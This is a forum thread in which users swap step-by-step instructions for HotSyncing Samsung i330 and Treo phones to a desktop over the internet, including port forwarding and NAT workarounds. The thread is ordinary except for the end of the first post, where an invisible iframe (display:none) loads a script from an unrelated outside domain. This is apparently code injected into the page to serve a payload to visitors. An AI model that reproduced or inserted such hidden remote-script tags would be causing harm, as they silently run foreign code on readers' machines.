internet sync a PDA phone

I have a Samsung 330 and I'm trying to find a product that will allow me to sync my PDA phone to my desktop through the internet connection on the PDA phone. I use Act! and other programs that I can only transfer data from my PDA phone using HotSync and usb connection.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Not sure you can do this.

I'm not sure there is an easy solution for this. I'd look for software that lets you do remote access to your desktop... then you might be able to get it to work from there. You'll also have to solve the problem of having your desktop be visible with a unique address on the internet. Then, from there it may require some amount of creativity to get it to work. I haven't seen an off the shelf solution to do this.

wireless hot sync to desktop computer using pdaphone

This was taken from someone on www.TreoCentral.com Be advised he used a Treo 300. Should work for any pdaphone. Hope this works for you. I've never used it. I believe in order for it to work your computer must be on and the idea behind this is to be able to back up your information onto your desktop if your pdaphone didn't have an expansion slot.

"Here is what he did to sync wirelessly...

Assuming you have a static IP address or at least a DHCP that renews every month or so like mine.

On your computer:

Right click on your Hotsync icon near the time. Click the "Network" button which will put a checkmark next to it thus enabling sync via network. Right click the icon and go into Setup. Click the network tab. Click TCP/IP settings. Leave this window open.

On your Treo:

Go into your HotSync program and click the options button. Click on Modem Sync Preferences. Make sure that "Network" is selected and hit OK. Also in the options click Primary PC Setup. Copy what you have open on your computer into this screen here. Hit OK.

Now before you hit the Sync icon make sure "Modem" is highlighted and the service it is using to connect (shown below the icon) is your Sprint login/network service.

Click the sync icon. If it connects the first time and immediately then consider yourself lucky. It usually connects on the second time for me. Takes about 1min. You might want to go into the Condiut Setup and uncheck all the unnecessary ones. I just sync my contacts/notes/datebook etc...

If you can't connect the first few times try seeing if you can ping your computer's IP using the "View Log" utility in the Network Preferences Options menu. There's actually a variety of commands you can use from that prompt (not to mention what your Treo's public IP is on the 3g Sprint network).

Another thing, this will obviously not work if you have a super protective hardware/software firewall active or if you have a NAT'd IP address behind a router. Unless of course you NAT the ports from your public IP assigned to the router to your internal computer IP. Anyways, hope I'm not confusing some of you. If you have a DHCP addy that changes from time to time you will need to change the settings on your Treo at that time."

It is completely possible to HotSync your i330 over the internet by following the following steps. I’ll be the first to admit that you have to jump through some hoops to get it working (and remembering all the settings you need), but once you do it a couple times, it’s a snap.

The instructions are broken down so that you make changes to the phone, the HotSync Computer, and then finally doing your first Sync. Don’t skip any steps.

**** Setup on your i330 Phone ****
1. Click on the HotSync icon
2. Go to Options --> Modem Sync Preferences. Choose “Network”
3. Go to Options --> LanSync Preferences. Choose “Local HotSync”
4. Go to Options --> Primary PC Address.
*** a. Set “Primary PC Name” to "!!" (2 exclamation points with no quotes).
*** b. Set “Primary PC Address” to the IP address of the computer(or router) that is attached to the internet.
*** c. Leave “Subnet Mask” blank
5. Go to Options --> Connection Setup. Make sure “Direct Serial” is highlighted. Click “Done”.

**** Setup on your Computer ****
1. Right-click the HotSync icon in the System tray and choose Setup.
2. Click the Network tab
3. Make sure the Profile you want to sync has a checkmark in the checkbox
4. Click the TCP/IP Settings and make sure that your correct IP address is chosen. If you only have one Network adapter (in most cases) this will be grayed-out.
5. Leave Subnet Mask blank and click OK.
6. Click OK again to close the Setup window.
7. Right-click the HotSync icon in the System tray and make sure “Network” has a checkmark next to it.

**** Firewalls & Routers ****
If your computer is behind a firewall or it has a router between it and the internet, you will have to do the following.

1. Make sure you have the following ports open: TCP:14237 & TCP:14238. This is how HotSync (on your phone) communicates with HotSync on your computer. So if you use a software firewall, you will have to allow HotSync to communicate with the internet over these ports. The Palm website indicates that port 14238 is for UDP, but my tests indicate that communication is happening on TCP.
2. If you use a router, you will have to have all requests on those ports forward to the internal computer with HotSync

**** Doing your first HotSync over the Internet ****
1. Click on HotSync and on the main screen, change from “Local” to “Modem”
2. When you change to Modem, it should show you “Sprint” as who it will dial.
3. Press the HotSync icon on this screen. HotSync will dial out to Sprint and initiate the synchronizing. You will see the HotSync notification box popup on the HotSync computer as the process happens (just as it would if it was a local HotSync.)

**** Notes ***
Thanks to member "Get Wright" for this one!
Setting the "Primary PC Name" to "!!" will prevent the HotSync settings in the i330 from getting set to their internal (Private LAN) settings.

Must use actual IP Address
Apparently DNS doesn’t work, because when I try to use my DNS name, which will forward to my Dynamic IP Address, it doesn’t work. If anyone knows how to get this to work, please let me know.

Maybe this will work. Maybe.

Also, if you are using NAT, here's an undocumented tip: On the Treo, when you set the Primary PC settings, make the system name "!!" -- two exclamation points -- this will prevent the Treo from automatically changing the IP from the public IP of your gateway to the private IP on the PC.

I had took this from someone else and I'm not for sure if it applies to you but maybe it could help you in some. Also I had wirelessly hotsynced the other day so I can contest also to it at first being a bit cumbersome to get it to work for me.

Question: Did it take longer than a minute or so to hotsync everything.

Sweet!!!! Thanks Get Wright! That worked. I'm going to go back and modify my original post so it reflects this!

My internet Hotsync usually takes about 1-2 minutes. I use Avant Go, so if I'm syncing that also, it takes longer.

Glad I could help.

Just checking. It took me two minutes also.

Feel free to read my post in the Treo forum and faq. I have alot of good info in there not just for Treo users but for all pda/phone users.

Take care.

PS: Glad to see someone else from Austin,TX.

FAQs

If you guys can identify what in the Treo FAQ will work for the other Palm based pdaPhones like the i330 and 7035, then I can move them over.... Thanks for this great thread.

How do I open the TCP ports?

How do I open the TCP ports in Win 98?

Also, I get two different IP address when I check the computer...winipcfg versus when I go to a site like whatismyip.com. I'm in a big office with a large network and a big IT department, so I would imagine it has something to do with the firewall.

Gallen,

I don't think you're going to be able to sync to your office computer unless you have a way to port-forword to your computer. Meaning that when a request on a particular port comes thru your network router, it will get forwarded to your computer where HotSync is running.

Unfortunately, this is probably not possible (or safe) in a business environment. You would have better luck setting this up on your home computer.

Synch ACT through Internet

I tried to synch through the internet. That would work just fine except that it will NOT work with the ActLink 2.0 or ACT for Palm. It always disconnects at that point.
The setup how to do the network synch through the internet is posted on this or other boards. ( Thats how I found it.)
Also, I have more than 10,000 contacts in ACT. I have to synch all of them, not just groups. Even trough a network synch on a broadband connection that took more than 15 hours!!!. Vs. 15 minutes in my office. O

Thanks for the tips. I am behind a router with NAT, and what got me working was to use, on the I330, "!!" in the computer name and the external IP for the IP address. And on the PC I used the internal 192.x IP and the subnet mask (from windows 2000 ipconfig).

How do I open the TCP ports in Win 98? I just have a home computer, but it has a etherfast cable/dsl router. I'm really not very familliar with how it works yet and I have no clue with how to open the TCP ports that I guess I will need to open for hotsync with my computer and my i330 via the web. Please email me if someone can help at joweleven@yahoo.com Thanks in advance, Joseph

Can the phone literally dial into a host computer that' s running hotsync (and accepting modem calls) ?

My phone connects, but I never get passed the "identifying user" screen..
